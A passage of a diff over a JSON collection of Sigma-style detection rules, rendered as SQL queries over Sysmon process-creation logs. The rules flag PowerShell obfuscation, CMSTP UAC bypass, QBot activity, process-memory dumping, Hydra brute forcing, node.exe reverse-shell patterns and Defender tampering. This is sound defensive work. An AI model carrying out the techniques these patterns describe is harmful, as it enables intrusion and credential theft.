- "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.t1027", - "attack.execution", + "attack.defense_evasion", + "attack.t1140", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", - "status": "experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "title": "Malicious Windows Script Components File Execution by TAEF Detection", + "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "status": "test", + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_susp_use_of_te_bin.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "author": "frack113", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "status": "test", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", - "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." + "Legitimate admin scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_hotfix.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Command Line Execution with Suspicious URL and AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "status": "test", + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.command_and_control", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1105" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "High" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_cmd_http_appdata.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", - "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Malicious Windows Script Components File Execution by TAEF Detection", - "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "title": "Taskmgr as Parent", + "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "status": "test", - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", - "author": "Agro (@agro_sev) oscd.community", + "description": "Detects the creation of a process from Windows task manager", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + "Administrative activity" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\resmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_use_of_te_bin.yml" + "filename": "proc_creation_win_taskmgr_susp_child_process.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "status": "experimental", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' 